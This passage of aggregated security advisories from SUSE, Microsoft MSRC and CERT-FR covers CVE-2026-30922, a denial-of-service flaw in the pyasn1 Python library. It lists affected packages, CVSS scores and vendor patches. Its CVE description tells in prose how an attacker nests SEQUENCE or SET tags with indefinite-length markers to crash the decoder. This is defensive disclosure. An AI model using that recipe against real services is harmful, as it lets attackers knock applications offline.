"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python-pyasn1-0.1.9-4.14.1.noarch",
"product": {
"name": "python-pyasn1-0.1.9-4.14.1.noarch",
"product_id": "python-pyasn1-0.1.9-4.14.1.noarch"
}
},
{
"category": "product_version",
"name": "python3-pyasn1-0.1.9-4.14.1.noarch",
"product": {
"name": "python3-pyasn1-0.1.9-4.14.1.noarch",
"product_id": "python3-pyasn1-0.1.9-4.14.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:12:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss-extended-security:12:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pyasn1-0.1.9-4.14.1.noarch as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:python-pyasn1-0.1.9-4.14.1.noarch"
},
"product_reference": "python-pyasn1-0.1.9-4.14.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.1.9-4.14.1.noarch as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:python3-pyasn1-0.1.9-4.14.1.noarch"
},
"product_reference": "python3-pyasn1-0.1.9-4.14.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-pyasn1-0.1.9-4.14.1.noarch as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python-pyasn1-0.1.9-4.14.1.noarch"
},
"product_reference": "python-pyasn1-0.1.9-4.14.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyasn1-0.1.9-4.14.1.noarch as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python3-pyasn1-0.1.9-4.14.1.noarch"
},
"product_reference": "python3-pyasn1-0.1.9-4.14.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:python3-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python3-pyasn1-0.1.9-4.14.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:python3-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python3-pyasn1-0.1.9-4.14.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server 12 SP5-LTSS:python3-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python-pyasn1-0.1.9-4.14.1.noarch",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:python3-pyasn1-0.1.9-4.14.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T12:42:05Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:20835-1
Vulnerability from csaf_suse - Published: 2026-03-25 03:09 - Updated: 2026-03-25 03:09Summary
Security update for python-pyasn1
Severity
Important
Notes
Title of the patch: Security update for python-pyasn1
Description of the patch: This update for python-pyasn1 fixes the following issue:
- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).
Patchnames: SUSE-SL-Micro-6.2-438
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issue:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SL-Micro-6.2-438",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20835-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20835-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620835-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20835-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025002.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-25T03:09:26Z",
"generator": {
"date": "2026-03-25T03:09:26Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20835-1",
"initial_release_date": "2026-03-25T03:09:26Z",
"revision_history": [
{
"date": "2026-03-25T03:09:26Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python313-pyasn1-0.6.1-160000.4.1.noarch",
"product": {
"name": "python313-pyasn1-0.6.1-160000.4.1.noarch",
"product_id": "python313-pyasn1-0.6.1-160000.4.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.2",
"product": {
"name": "SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:transactional"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python313-pyasn1-0.6.1-160000.4.1.noarch as component of SUSE Linux Micro 6.2",
"product_id": "SUSE Linux Micro 6.2:python313-pyasn1-0.6.1-160000.4.1.noarch"
},
"product_reference": "python313-pyasn1-0.6.1-160000.4.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:python313-pyasn1-0.6.1-160000.4.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:python313-pyasn1-0.6.1-160000.4.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:python313-pyasn1-0.6.1-160000.4.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T03:09:26Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
SUSE-SU-2026:20878-1
Vulnerability from csaf_suse - Published: 2026-03-25 09:44 - Updated: 2026-03-25 09:44Summary
Security update for python-pyasn1
Severity
Important
Notes
Title of the patch: Security update for python-pyasn1
Description of the patch: This update for python-pyasn1 fixes the following issue:
- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).
Patchnames: SUSE-SLE-Micro-6.1-461
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
References
| URL | Category | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for python-pyasn1",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for python-pyasn1 fixes the following issue:\n\n- CVE-2026-30922: Denial of Service via Unbounded Recursion (bsc#1259803).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLE-Micro-6.1-461",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20878-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20878-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620878-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20878-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/025053.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259803",
"url": "https://bugzilla.suse.com/1259803"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-30922 page",
"url": "https://www.suse.com/security/cve/CVE-2026-30922/"
}
],
"title": "Security update for python-pyasn1",
"tracking": {
"current_release_date": "2026-03-25T09:44:19Z",
"generator": {
"date": "2026-03-25T09:44:19Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20878-1",
"initial_release_date": "2026-03-25T09:44:19Z",
"revision_history": [
{
"date": "2026-03-25T09:44:19Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch",
"product": {
"name": "python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch",
"product_id": "python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Micro 6.1",
"product": {
"name": "SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sl-micro:6.1"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch as component of SUSE Linux Micro 6.1",
"product_id": "SUSE Linux Micro 6.1:python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch"
},
"product_reference": "python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch",
"relates_to_product_reference": "SUSE Linux Micro 6.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-30922"
}
],
"notes": [
{
"category": "general",
"text": "pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with \"Indefinite Length\" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-30922",
"url": "https://www.suse.com/security/cve/CVE-2026-30922"
},
{
"category": "external",
"summary": "SUSE Bug 1259803 for CVE-2026-30922",
"url": "https://bugzilla.suse.com/1259803"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:python311-pyasn1-0.5.0-slfo.1.1_3.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T09:44:19Z",
"details": "important"
}
],
"title": "CVE-2026-30922"
}
]
}
MSRC_CVE-2026-30922
Vulnerability from csaf_microsoft - Published: 2026-03-02 00:00 - Updated: 2026-03-31 15:08Summary
pyasn1 Vulnerable to Denial of Service via Unbounded Recursion
Notes
Additional Resources: To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer: The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
7.5 (High)
Vendor Fix
0.4.8-2:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade
https://learn.microsoft.com/en-us/azure/azure-lin…
References
| URL | Category | |
|---|---|---|
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2026-30922 pyasn1 Vulnerable to Denial of Service via Unbounded Recursion - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2026/msrc_cve-2026-30922.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "pyasn1 Vulnerable to Denial of Service via Unbounded Recursion",
"tracking": {
"current_release_date": "2026-03-31T15:08:36.000Z",
"generator": {
"date": "2026-04-01T07:38:22.487Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2026-30922",
"initial_release_date": "2026-03-02T00:00:00.000Z",
"revision_history": [
{
"date": "2026-03-21T01:02:51.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2026-03-27T14:39:08.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
},
{
"date": "2026-03-28T14:37:21.000Z",
"legacy_version": "3",
"number": "3",
"summary": "Information published."
},
{
"date": "2026-03-31T15:08:36.000Z",
"legacy_version": "4",
"number": "4",
"summary": "Information published."
}
],
"status": "final",
"version": "4"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
},
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cazl3 python-pyasn1 0.4.8-1",
"product": {
"name": "\u003cazl3 python-pyasn1 0.4.8-1",
"product_id": "3"
}
},
{
"category": "product_version",
"name": "azl3 python-pyasn1 0.4.8-1",
"product": {
"name": "azl3 python-pyasn1 0.4.8-1",
"product_id": "20840"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 python-pyasn1 0.4.8-1",
"product": {
"name": "\u003ccbl2 python-pyasn1 0.4.8-1",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "cbl2 python-pyasn1 0.4.8-1",
"product": {
"name": "cbl2 python-pyasn1 0.4.8-1",
"product_id": "20841"
}
},
{
"category": "product_version_range",
"name": "\u003cazl3 python-pyasn1 0.4.8-2",
"product": {
"name": "\u003cazl3 python-pyasn1 0.4.8-2",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 python-pyasn1 0.4.8-2",
"product": {
"name": "azl3 python-pyasn1 0.4.8-2",
"product_id": "21138"
}
}
],
"category": "product_name",
"name": "python-pyasn1"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 python-pyasn1 0.4.8-1 as a component of Azure Linux 3.0",
"product_id": "17084-3"
},
"product_reference": "3",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 python-pyasn1 0.4.8-1 as a component of Azure Linux 3.0",
"product_id": "20840-17084"
},
"product_reference": "20840",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 python-pyasn1 0.4.8-1 as a component of CBL Mariner 2.0",
"product_id": "17086-2"
},
"product_reference": "2",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 python-pyasn1 0.4.8-1 as a component of CBL Mariner 2.0",
"product_id": "20841-17086"
},
"product_reference": "20841",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 python-pyasn1 0.4.8-2 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 python-pyasn1 0.4.8-2 as a component of Azure Linux 3.0",
"product_id": "21138-17084"
},
"product_reference": "21138",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-30922",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20840-17084",
"20841-17086",
"21138-17084"
],
"known_affected": [
"17084-3",
"17086-2",
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-30922 pyasn1 Vulnerable to Denial of Service via Unbounded Recursion - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2026/msrc_cve-2026-30922.json"
}
],
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-21T01:02:51.000Z",
"details": "0.4.8-2:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-3",
"17086-2",
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"environmentalsScore": 0.0,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"temporalScore": 7.5,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"17084-3",
"17086-2",
"17084-1"
]
}
],
"title": "pyasn1 Vulnerable to Denial of Service via Unbounded Recursion"
}
]
}
CERTFR-2026-AVI-0376
Vulnerability from certfr_avis - Published: 2026-03-30 - Updated: 2026-03-30
De multiples vulnérabilités ont été découvertes dans les produits Microsoft. Elles permettent à un attaquant de provoquer un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Microsoft | CBL Mariner | cbl2 telegraf 1.29.4-21 versions antérieures à 1.29.4-22 | ||
| Microsoft | Azure Linux | azl3 glibc 2.38-18 versions antérieures à 2.38-19 | ||
| Microsoft | Azure Linux | azl3 squid 6.13-3 versions antérieures à 6.13-4 | ||
| Microsoft | Azure Linux | azl3 python-pyasn1 0.4.8-1 versions antérieures à 0.4.8-2 | ||
| Microsoft | Azure Linux | azl3 nginx 1.28.2-1 versions antérieures à 1.28.3-1 | ||
| Microsoft | CBL Mariner | cbl2 ncurses 6.4-3 versions antérieures à 6.4-4 | ||
| Microsoft | Azure Linux | azl3 kernel 6.6.126.1-1 versions antérieures à 6.6.130.1-1 | ||
| Microsoft | Azure Linux | azl3 ncurses 6.4-2 versions antérieures à 6.4-3 | ||
| Microsoft | CBL Mariner | cbl2 terraform 1.3.2-29 versions antérieures à 1.3.2-30 | ||
| Microsoft | Azure Linux | azl3 libsoup 3.4.4-12 versions antérieures à 3.4.4-14 | ||
| Microsoft | Azure Linux | azl3 etcd 3.5.21-1 versions antérieures à 3.5.28-1 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "cbl2 telegraf 1.29.4-21 versions ant\u00e9rieures \u00e0 1.29.4-22",
"product": {
"name": "CBL Mariner",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 glibc 2.38-18 versions ant\u00e9rieures \u00e0 2.38-19",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 squid 6.13-3 versions ant\u00e9rieures \u00e0 6.13-4",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
"scada": false
}
}
},
{
"description": "azl3 python-pyasn1 0.4.8-1 versions ant\u00e9rieures \u00e0 0.4.8-2",
"product": {
"name": "Azure Linux",
"vendor": {
"name": "Microsoft",
